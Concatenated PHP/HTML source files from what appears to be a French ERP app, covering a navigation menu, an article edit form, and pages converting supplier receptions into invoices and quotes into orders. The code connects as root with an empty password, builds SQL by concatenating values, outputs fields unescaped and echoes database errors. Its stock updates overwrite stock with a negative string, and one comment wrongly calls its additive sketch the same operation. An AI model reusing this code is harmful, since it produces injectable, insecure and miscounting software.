<li><a href="<?php echo $rootsite; ?>core/achat/reception/">Modifier une Reception</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/reception/">Supprimer une Reception</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Facture Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/facture/index.facture.php">Liste des Factures</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/facture/nouv.facture.php">Nouvelle Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/facture/">Modifier une Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/facture/">Supprimer une Facture</a></li>
</ul>
</li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-shopping-cart"></i>
<span class="title">Ventes</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/">Tableau de Bord des Ventes</a></li>
<li>
<a href="javascript:;"><span class="title">Devis Client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/devis/">Liste des Devis client</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/devis/nouv.devis.php">Nouveau Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/devis/">Modifier un Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/devis/">Supprimer un Devis</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Commande client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/commande/">Liste des Commandes</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/commande/nouv.commande.php">Nouvelle Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/commande/">Modifier une Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/commande/">Supprimer une Commande</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Bon de Livraison client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/">Liste des livraison</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/nouv.livraison.php">Nouvelle livraison</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/">Modifier une livraison</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/livraison/">Supprimer une livraison</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Facture client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/vente/facture/">Liste des Factures</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/facture/nouv.facture.php">Nouvelle Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/facture/">Modifier une Facture</a></li>
<li><a href="<?php echo $rootsite; ?>core/vente/facture/">Supprimer une Facture</a></li>
</ul>
</li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-eur"></i>
<span class="title">Tresorerie</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/tresorerie/caisse/">Gestion des Caisses</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/tpe/">Gestion des Terminaux de Paiement</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/traite/">Gestion des Traites et Prélevement</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/cpt/">Gestion des Comptes Bancaires</a></li>
<li class="divider"></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/sit_client/">Situation Client</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/sit_fournisseur/">Situation Fournisseur</a></li>
<li class="divider"></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/jo_achat/">Journal des Achats</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/jo_vente/">Journal des Ventes</a></li>
<li><a href="<?php echo $rootsite; ?>core/tresorerie/jo_tresorerie/">Journaux de Trésorerie</a></li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-eur"></i>
<span class="title">Outils</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/outils/newsletter/">Gestion Newsletter</li></a>
<li><a href="<?php echo $rootsite; ?>core/outils/support/">Support Ticket</a></li>
<li><a href="">Interface SAV</a></li>
<li><a href="">Gestion des Agenda</a></li>
</ul>
</li>
<div class="clearfix"></div>
<!-- END SIDEBAR WIDGETS -->
</div>
</div>
<!-- BEGIN SCROLL UP HOVER -->
<a href="#" class="scrollup">Scroll</a>
<!-- END SCROLL UP HOVER -->
<!-- END MENU -->
<!-- BEGIN SIDEBAR FOOTER WIDGET -->
<div class="footer-widget">
<span>Version: 1.0.0</span>
</div>
<!-- END SIDEBAR FOOTER WIDGET -->
<!-- END SIDEBAR -->
<!-- BEGIN PAGE CONTAINER--><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idarticle = (int) $_GET['idarticle']; // cast keeps the id numeric before it is concatenated into the query below
$sql_article = mysql_query("SELECT * FROM article WHERE idarticle =".$idarticle);
$donnee_article = mysql_fetch_array($sql_article);
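// Hedged sketch, not called anywhere in this page: a server-side counterpart to
// the 99/99/9999 input mask applied below. The function name and the dd/mm/yyyy
// format are assumptions based on the mask, not taken from the original code.
function is_valid_date_fr($s) {
	$d = DateTime::createFromFormat('d/m/Y', $s);
	// createFromFormat() is lenient (e.g. 32/01/2015 rolls over), so re-format and compare
	return $d !== false && $d->format('d/m/Y') === $s;
}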
?>
<script type="text/javascript">
$("#date").mask("99/99/9999");
</script>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Article</a></li>
<li><a href="modif.article.php" class="active"><span class="semi-bold">Modifier Article</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ARTICLE - <span class="semi-bold">Modifier Article</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple transparent">
<div class="grid-title">
<h4>Modifier <span class="semi-bold">Article</span></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<div class="row">
<form id="commentForm" action="valid.modif.article.php" method="post">
<div id="rootwizard" class="col-md-12">
<div class="form-wizard-steps">
<ul class="wizard-steps">
<li class="" data-target="#step1"> <a href="#tab1" data-toggle="tab"> <span class="step">1</span> <span class="title">Information Générale</span> </a> </li>
<li data-target="#step2" class=""> <a href="#tab2" data-toggle="tab"> <span class="step">2</span> <span class="title">Description</span> </a> </li>
<li data-target="#step3" class=""> <a href="#tab3" data-toggle="tab"> <span class="step">3</span> <span class="title">Tarif</span> </a> </li>
<li data-target="#step4" class=""> <a href="#tab4" data-toggle="tab"> <span class="step">4</span> <span class="title">Stock</span> </a> </li>
<li data-target="#step5" class=""> <a href="#tab5" data-toggle="tab"> <span class="step">5</span> <span class="title">Images</span> </a> </li>
</ul>
<div class="clearfix"></div>
</div>
<div class="tab-content transparent">
<div class="tab-pane" id="tab1"> <br>
<h4 class="semi-bold">Etape 1 - <span class="light">Information Générale</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<input type="text" placeholder="<?php echo $donnee_article['idarticle']; ?>" class="form-control no-boarder " name="idarticle" id="txtFirstName" value= "<?php echo $donnee_article['idarticle']; ?>" hidden>
</div>
<div class="col-md-12">
<input type="text" placeholder="<?php echo $donnee_article['desc_court']; ?>" class="form-control no-boarder " name="desc_court" id="txtFirstName" value= "<?php echo $donnee_article['desc_court']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-12">
<select name="idfamillearticle" class="form-control no-boarder ">
<?php
$sql_famille_article = mysql_query("SELECT * FROM famille_article");
while($donnee_famille_article = mysql_fetch_array($sql_famille_article))
{
?>
<option value="<?php echo $donnee_famille_article['idfamillearticle']; ?>"><?php echo $donnee_famille_article['designation']; ?></option>
<?php } ?>
</select>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<select name="idfournisseur" class="form-control no-boarder ">
<?php
$sql_fournisseur = mysql_query("SELECT * FROM fournisseur");
while($donnee_fournisseur = mysql_fetch_array($sql_fournisseur))
{
?>
<option value="<?php echo $donnee_fournisseur['idfournisseur']; ?>"><?php echo $donnee_fournisseur['raison_social']; ?></option>
<?php } ?>
</select>
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['ref_fournisseur']; ?>" class="form-control no-boarder " name="ref_fournisseur" id="txtFirstName" value = "<?php echo $donnee_article['ref_fournisseur']; ?>" >
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['ref_interne']; ?>" class="form-control no-boarder " name="ref_interne" id="txtFirstName" value = "<?php echo $donnee_article['ref_interne']; ?>">
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<input type="text" class="form-control" name="date_debut" placeholder="<?php echo $donnee_article['date_debut']; ?>" value = "<?php echo $donnee_article['date_debut']; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<input type="text" class="form-control" name="date_fin" placeholder="<?php echo $donnee_article['date_fin']; ?>" value = "<?php echo $donnee_article['date_fin']; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<input type="text" placeholder="<?php echo $donnee_article['num_serie']; ?>" class="form-control no-boarder " name="num_serie" id="txtFirstName" value = "<?php echo $donnee_article['num_serie']; ?>">
</div>
<div class="col-md-6">
<input type="text" placeholder="<?php echo $donnee_article['code_barre']; ?>" class="form-control no-boarder " name="code_barre" id="txtFirstName" value = "<?php echo $donnee_article['code_barre']; ?>">
</div>
</div>
</div>
<div class="tab-pane" id="tab2"> <br>
<h4 class="semi-bold">Etape 2 - <span class="light">Description</span></h4>
<br>
<div class="row">
<div class="col-md-12">
<textarea row="12" col="12" name="desc_long" style="width: 1145px; height: 163px;"><?php echo $donnee_article['desc_long']; ?></textarea>
</div>
</div>
</div>
<div class="tab-pane" id="tab3"> <br>
<h4 class="semi-bold">Etape 3 - <span class="light">Tarif</span></h4>
<br>
<div class="row form-row">
<div class="col-md-3">
<label>Prix Achat HT</label>
<input type="text" placeholder="<?php echo $donnee_article['prix_achat_ht']; ?>" class="form-control no-boarder " name="prix_achat_ht" id="txtFirstName" value= "<?php echo $donnee_article['prix_achat_ht']; ?>">
</div>
<div class="col-md-3">
<label>Prix de Vente HT</label>
<input type="text" placeholder="<?php echo $donnee_article['prix_vente_ht']; ?>" class="form-control no-boarder " name="prix_vente_ht" id="txtFirstName" value = "<?php echo $donnee_article['prix_vente_ht']; ?>">
</div>
<div class="col-md-3">
<label>Prix de Vente TTC</label>
<input type="text" placeholder="<?php echo $donnee_article['prix_vente_ttc']; ?>" class="form-control no-boarder " name="prix_vente_ttc" id="txtFirstName" value = "<?php echo $donnee_article['prix_vente_ttc']; ?>">
</div>
</div>
</div>
<div class="tab-pane" id="tab4"> <br>
<h4 class="semi-bold">Etape 4 - <span class="light">Stock</span></h4>
<br>
<div class="row form-row">
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['stock_minima']; ?>" class="form-control no-boarder " name="stock_minima" id="txtFirstName" value = "<?php echo $donnee_article['stock_minima']; ?>">
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['stock_reel']; ?>" class="form-control no-boarder " name="stock_reel" id="txtFirstName" value = "<?php echo $donnee_article['stock_reel']; ?>">
</div>
<div class="col-md-3">
<input type="text" placeholder="<?php echo $donnee_article['poids']; ?>" class="form-control no-boarder " name="poids" id="txtFirstName" value= "<?php echo $donnee_article['poids']; ?>">Kg
</div>
<div class="col-md-3">
<select name="duree_garantie" class="form-control no-boarder">
<option value="1">1 An</option>
<option value="2">2 Ans</option>
<option value="3">3 Ans</option>
<option value="5">5 Ans</option>
<option value="10">10 Ans</option>
<option value="99">A vie</option>
</select>
</div>
</div>
</div>
<div class="tab-pane" id="tab5"> <br>
<h4 class="semi-bold">Etape 5 - <span class="light">Images</span></h4>
<br>
<div class="row form-row">
<div class="col-md-4">
<input type="text" placeholder="<?php echo $donnee_article['images']; ?>" class="form-control no-boarder " name="images" id="txtFirstName" value = "<?php echo $donnee_article['images']; ?>">
</div>
</div>
<div class="row form-row">
<img src="<?php echo $donnee_article['images']; ?>" />
</div>
<div class="row form-row">
<button class="btn btn-primary btn-cons" type="submit">Valider</button>
<button class="btn btn-danger btn-cons" type="reset">Reset</button>
</div>
</div>
<ul class=" wizard wizard-actions">
<li class="previous first" style="display:none;"><a href="javascript:;" class="btn"> First </a></li>
<li class="previous"><a href="javascript:;" class="btn"> Previous </a></li>
<li class="next last" style="display:none;"><a href="javascript:;" class="btn btn-primary"> Last </a></li>
<li class="next"><a href="javascript:;" class="btn btn-primary"> Next </a></li>
</ul>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrap-form-wizard/js/jquery.bootstrap.wizard.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-inputmask/jquery.inputmask.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-wysihtml5/bootstrap-wysihtml5.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/form_validations.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/form_elements.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$idreceptionfour = (int) $_GET['idreceptionfour']; // cast keeps the id numeric before it is concatenated into the queries below
// Import line items from the reception and its originating supplier order
$date = date("d-m-Y");
$date_mois30 = date("d-m-Y",strtotime("+30 DAYS"));
$sql_reception_four = mysql_query("SELECT * FROM `reception_four` WHERE idreceptionfour =".$idreceptionfour);
$donnee_reception_four = mysql_fetch_array($sql_reception_four);
$sql_cmd_four = mysql_query("SELECT * FROM cmd_four WHERE idcmdfour =".$donnee_reception_four['idcmdfour']);
$donnee_cmd_four = mysql_fetch_array($sql_cmd_four);
$idcmdfour = $donnee_reception_four['idcmdfour'];
$idfournisseur = $donnee_reception_four['idfournisseur'];
$date_reception_four = date("d-m-Y");
$art1 = $donnee_reception_four['art1'];
$art2 = $donnee_reception_four['art2'];
$art3 = $donnee_reception_four['art3'];
$art4 = $donnee_reception_four['art4'];
$art5 = $donnee_reception_four['art5'];
$art6 = $donnee_reception_four['art6'];
$art7 = $donnee_reception_four['art7'];
$art8 = $donnee_reception_four['art8'];
$art9 = $donnee_reception_four['art9'];
$art10 = $donnee_reception_four['art10'];
$art11 = $donnee_reception_four['art11'];
$art12 = $donnee_reception_four['art12'];
$qte1 = $donnee_reception_four['qte1'];
$qte2 = $donnee_reception_four['qte2'];
$qte3 = $donnee_reception_four['qte3'];
$qte4 = $donnee_reception_four['qte4'];
$qte5 = $donnee_reception_four['qte5'];
$qte6 = $donnee_reception_four['qte6'];
$qte7 = $donnee_reception_four['qte7'];
$qte8 = $donnee_reception_four['qte8'];
$qte9 = $donnee_reception_four['qte9'];
$qte10 = $donnee_reception_four['qte10'];
$qte11 = $donnee_reception_four['qte11'];
$qte12 = $donnee_reception_four['qte12'];
$pvht1 = $donnee_cmd_four['pvht1'];
$pvht2 = $donnee_cmd_four['pvht2'];
$pvht3 = $donnee_cmd_four['pvht3'];
$pvht4 = $donnee_cmd_four['pvht4'];
$pvht5 = $donnee_cmd_four['pvht5'];
$pvht6 = $donnee_cmd_four['pvht6'];
$pvht7 = $donnee_cmd_four['pvht7'];
$pvht8 = $donnee_cmd_four['pvht8'];
$pvht9 = $donnee_cmd_four['pvht9'];
$pvht10 = $donnee_cmd_four['pvht10'];
$pvht11 = $donnee_cmd_four['pvht11'];
$pvht12 = $donnee_cmd_four['pvht12'];
$port = $donnee_cmd_four['port'];
$remise = $donnee_cmd_four['remise'];
$eco_part = $donnee_cmd_four['eco-part'];
$ptht_cmd_four = $donnee_cmd_four['ptht_cmd_four'];
$taxe_cmd_four = $donnee_cmd_four['taxe_cmd_four'];
$ptttc_cmd_four = $donnee_cmd_four['ptttc_cmd_four'];
$sql_facture_four = "INSERT INTO `fact_four`(`idfactfour`, `idcmdfour`, `idreceptionfour`, `idfournisseur`, `date_facture_four`, `etat_fact_four`, `date_echeance_fact_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_fact_four`, `taxe_fact_four`, `ptttc_fact_four`)
VALUES ('','$idcmdfour','$idreceptionfour','$idfournisseur','$date','1','$date_mois30','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5',
'$art6','$qte6','$art7','$qte7','$art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8',
'$pvht9','$pvht10','$pvht11','$pvht12','$port','$remise','$eco_part','$ptht_cmd_four','$taxe_cmd_four','$ptttc_cmd_four')";
$sql_article_stock1 = "UPDATE `article` SET `stock_reel`='-$qte1' WHERE desc_court ='$art1'";
$sql_article_stock2 = "UPDATE `article` SET `stock_reel`='-$qte2' WHERE desc_court ='$art2'";
$sql_article_stock3 = "UPDATE `article` SET `stock_reel`='-$qte3' WHERE desc_court ='$art3'";
$sql_article_stock4 = "UPDATE `article` SET `stock_reel`='-$qte4' WHERE desc_court ='$art4'";
$sql_article_stock5 = "UPDATE `article` SET `stock_reel`='-$qte5' WHERE desc_court ='$art5'";
$sql_article_stock6 = "UPDATE `article` SET `stock_reel`='-$qte6' WHERE desc_court ='$art6'";
$sql_article_stock7 = "UPDATE `article` SET `stock_reel`='-$qte7' WHERE desc_court ='$art7'";
$sql_article_stock8 = "UPDATE `article` SET `stock_reel`='-$qte8' WHERE desc_court ='$art8'";
$sql_article_stock9 = "UPDATE `article` SET `stock_reel`='-$qte9' WHERE desc_court ='$art9'";
$sql_article_stock10 = "UPDATE `article` SET `stock_reel`='-$qte10' WHERE desc_court ='$art10'";
$sql_article_stock11 = "UPDATE `article` SET `stock_reel`='-$qte11' WHERE desc_court ='$art11'";
$sql_article_stock12 = "UPDATE `article` SET `stock_reel`='-$qte12' WHERE desc_court ='$art12'";
$result_facture_four = mysql_query($sql_facture_four); // keep the result so the success/error blocks below can test it
mysql_query($sql_article_stock1);
mysql_query($sql_article_stock2);
mysql_query($sql_article_stock3);
mysql_query($sql_article_stock4);
mysql_query($sql_article_stock5);
mysql_query($sql_article_stock6);
mysql_query($sql_article_stock7);
mysql_query($sql_article_stock8);
mysql_query($sql_article_stock9);
mysql_query($sql_article_stock10);
mysql_query($sql_article_stock11);
mysql_query($sql_article_stock12);
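// Hedged alternative sketch, never called by this page: the twelve statements
// above expressed as one loop. The function name is an assumption; a caller would
// pass array($art1, ..., $art12) and the matching quantities. The use of
// mysql_real_escape_string is also an assumption, not part of the original code.
function apply_reception_to_stock(array $arts, array $qtes) {
	foreach ($arts as $i => $art) {
		$qte = (int) $qtes[$i];
		if ($art !== '' && $qte > 0) {
			// same increment as the per-line statements above, one query per received item
			mysql_query("UPDATE `article` SET `stock_reel` = stock_reel + $qte"
				. " WHERE desc_court = '" . mysql_real_escape_string($art) . "'");
		}
	}
}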
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">FACTURE</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Transfere en Facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Transfere en Facture</span></h3>
</div>
<?php
if($result_facture_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> La Facture Numéro FACFOUR000<?php echo $idreceptionfour; ?> a été transférée avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($result_facture_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une erreur de type <b><?php echo mysql_error(); ?></b> s'est produite. Vérifiez votre code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$iddevisfour = (int) $_GET['iddevisfour']; // cast keeps the id numeric before it is concatenated into the query below
// Import line items from the supplier quote
$sql_devis_four = mysql_query("SELECT * FROM `devis_four` WHERE iddevisfour =".$iddevisfour);
$donnee_devis_four = mysql_fetch_array($sql_devis_four);
$idcmdfour = $donnee_devis_four['iddevisfour'];
$idfournisseur = $donnee_devis_four['idfournisseur'];
$date_cmd_four = $donnee_devis_four['date_devis_four'];
$art1 = $donnee_devis_four['art1'];
$art2 = $donnee_devis_four['art2'];
$art3 = $donnee_devis_four['art3'];
$art4 = $donnee_devis_four['art4'];
$art5 = $donnee_devis_four['art5'];
$art6 = $donnee_devis_four['art6'];
$art7 = $donnee_devis_four['art7'];
$art8 = $donnee_devis_four['art8'];
$art9 = $donnee_devis_four['art9'];
$art10 = $donnee_devis_four['art10'];
$art11 = $donnee_devis_four['art11'];
$art12 = $donnee_devis_four['art12'];
$qte1 = $donnee_devis_four['qte1'];
$qte2 = $donnee_devis_four['qte2'];
$qte3 = $donnee_devis_four['qte3'];
$qte4 = $donnee_devis_four['qte4'];
$qte5 = $donnee_devis_four['qte5'];
$qte6 = $donnee_devis_four['qte6'];
$qte7 = $donnee_devis_four['qte7'];
$qte8 = $donnee_devis_four['qte8'];
$qte9 = $donnee_devis_four['qte9'];
$qte10 = $donnee_devis_four['qte10'];
$qte11 = $donnee_devis_four['qte11'];
$qte12 = $donnee_devis_four['qte12'];
$pvht1 = $donnee_devis_four['pvht1'];
$pvht2 = $donnee_devis_four['pvht2'];
$pvht3 = $donnee_devis_four['pvht3'];
$pvht4 = $donnee_devis_four['pvht4'];
$pvht5 = $donnee_devis_four['pvht5'];
$pvht6 = $donnee_devis_four['pvht6'];
$pvht7 = $donnee_devis_four['pvht7'];
$pvht8 = $donnee_devis_four['pvht8'];
$pvht9 = $donnee_devis_four['pvht9'];
$pvht10 = $donnee_devis_four['pvht10'];
$pvht11 = $donnee_devis_four['pvht11'];
$pvht12 = $donnee_devis_four['pvht12'];
$port = $donnee_devis_four['port'];
$remise = $donnee_devis_four['remise'];
$eco_part = $donnee_devis_four['eco-part'];
$ptht_cmd_four = $donnee_devis_four['ptht_devis_four'];
$taxe_cmd_four = $donnee_devis_four['taxe_devis_four'];
$ptttc_cmd_four = $donnee_devis_four['ptttc_devis_four'];
$sql_cmd_four = "INSERT INTO `cmd_four`(`idcmdfour`, `idfournisseur`, `date_cmd_four`, `etat_cmd_four`, `date_livraison_cmd_four`, `art1`, `qte1`, `art2`, `qte2`, `art3`, `qte3`, `art4`, `qte4`, `art5`, `qte5`, `art6`, `qte6`, `art7`, `qte7`, `art8`, `qte8`, `art9`, `qte9`, `art10`, `qte10`, `art11`, `qte11`, `art12`, `qte12`, `pvht1`, `pvht2`, `pvht3`, `pvht4`, `pvht5`, `pvht6`, `pvht7`, `pvht8`, `pvht9`, `pvht10`, `pvht11`, `pvht12`, `port`, `remise`, `eco-part`, `ptht_cmd_four`, `taxe_cmd_four`, `ptttc_cmd_four`)
VALUES ('','$idfournisseur','$date_cmd_four','1','','$art1','$qte1','$art2','$qte2','$art3','$qte3','$art4','$qte4','$art5','$qte5','$art6','$qte6','$art7','$qte7',
'$art8','$qte8','$art9','$qte9','$art10','$qte10','$art11','$qte11','$art12','$qte12','$pvht1','$pvht2','$pvht3','$pvht4','$pvht5','$pvht6','$pvht7','$pvht8','$pvht9','$pvht10','$pvht11',
'$pvht12','$port','$remise','$eco_part','$ptht_cmd_four','$taxe_cmd_four','$ptttc_cmd_four')";
$result_cmd_four = mysql_query($sql_cmd_four); // keep the result so the success/error blocks below can test it
